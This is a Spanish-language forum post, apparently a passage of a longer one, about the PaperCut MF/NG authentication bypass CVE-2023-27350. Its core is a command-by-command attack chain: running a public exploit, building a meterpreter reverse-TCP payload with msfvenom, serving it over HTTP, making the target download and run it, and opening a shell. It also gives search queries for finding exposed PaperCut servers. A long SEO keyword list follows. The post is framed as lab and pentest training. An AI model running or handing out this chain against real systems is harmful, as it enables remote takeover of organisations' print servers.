a un authenticaton bypass. Basicamente a groso modo se saltea el logeo de acceso.
El producto realicinado a este nuevo bug son PaperCut MF and NG . Que es PaperCut?
Es un software de gestión de impresión integrado en impresoras, fotocopiadoras para monitorear y controlar la salida de impresión
de una organización con herramientas administrativas simples y fáciles de usar.
Se puede utilizar para realizar un seguimiento de la impresión, proporcionar informes sencillos y establecer reglas y restricciones
para garantizar,en última instancia, que tiene el control total de su impresión.
Hay una serie de escenarios que se pueden configurar en PaperCut:
Supervisión de la actividad en segundo plano
Monitoreo de actividad visible para el seguimiento de gastos para departamentos, proyectos o individuos
Cumplimiento de la asignación
Cargo o Precio por impresión
Reglas de trabajo configuradas para restringir la impresión en color o fomentar la impresión dúplex
Redirección al dispositivo más eficiente para un trabajo en particular.

Links o enlaces IMPORTANTES
https://amp-thehackernews-com.cdn.amppr ... t-for.html
https://github.com/adhikara13/CVE-2023-27350
https://github.com/TamingSariMY/CVE-2023-27350-POC
https://www.horizon3.ai/papercut-cve-20 ... ompromise/
https://github.com/horizon3ai/CVE-2023-27350
https://www.huntress.com/blog/critical- ... t-software
Download PC MF NG
COMANDOS
Código: Seleccionar todo
python3 vuln.py
python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "powershell.exe shutdown /s"
Servidor Web para bajar la carga malicionsa
python3 -m http.server 80
Creamos la Carga Maliciosa
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe -o payload.exe LHOST=192.168.10.87 LPORT=4444
Ahora en listener en msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.10.87
set LPORT 4444
show options
exploit
python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "powershell.exe -c wget -OutFile C:\\Windows\\Tasks\\payload.exe http://192.168.10.87/payload.exe"
python3 CVE-2023-27350.py --url 'http://192.168.10.36:9191' --command "C:\\Windows\\Tasks\\payload.exe"
getuid
sysinfo
ipconfig
shell
Código: Seleccionar todo
http.html:"papercut"
http.html:"print"
http.html:"papercut" port:9191
http.title:"PaperCut Login"
Redes de computadoras,Seguridad en redes,Auditoría de seguridad,Protección de la información personal,Seguridad en línea,Protección de la privacidad en línea,Amenazas informáticas,Pentest Lab Setup,Python,Laboratorio de Trabajo,Ciberdelincuencia,Seguridad de la red doméstica,Penetration Tester,Cybersecurity Consultant,learn security,OSINT,oscp certification,try hack me hacking,ctf for beginners,ehtical hacking,cyber seguridad,security,tool,linux for ethical hackers,capacitacion,educacion,How Hackers Do It,cyber security,tutorial,Information Systems Security Professional,remote function,laboratorio,lab,servidor,como escalar privilegios en WINDOWS,CVE,Printer,Impresoras,hacker exploit,what is a red team,red team exploitation,metasploit,OSI Model Modelo,TCP/IP,Cyberseguridad,VPN,Testing,API Manager,Identity Server,Identity Server Analytics,Identity Server as Key Manager,Enterprise Integrator,Remote Code Execution,RCE,Linux Ubuntu,RCE exploit Critical,Java developers,Acceder a Servidores,Seguridad de la información,Análisis de vulnerabilidades,Seguridad en sistemas web,Explotación de vulnerabilidades,Seguridad en servidores web,Vulnerability,Bypass Detection,proof-of-concept (PoC),authentication bypass,Developing the Exploit,print management software,remote code execution,Ejecucion de codigo remoto,reverse shell connection,HP,Canon,Epson,Kyocera,Vulnerabilidades,Ejecución remota de código,Autenticación bypass,Hacking ético,Protección de datos,Ciberseguridad,Prevención de ataques,Protección de servidores,Seguridad en redes,Brechas de seguridad,Seguridad en sistemas,pentesting,pentester,Ciberataques,Seguridad en servidores,Brechas de datos,Explotación de vulnerabilidades,Protección de la información,Hacking de servidores,Análisis de vulnerabilidades,Pruebas de penetración,Código no autenticado,Acceso no autorizado,Protección contra hackers,Prevención de intrusos,Gestión de riesgos,Gestión de parches,Protección de servidores web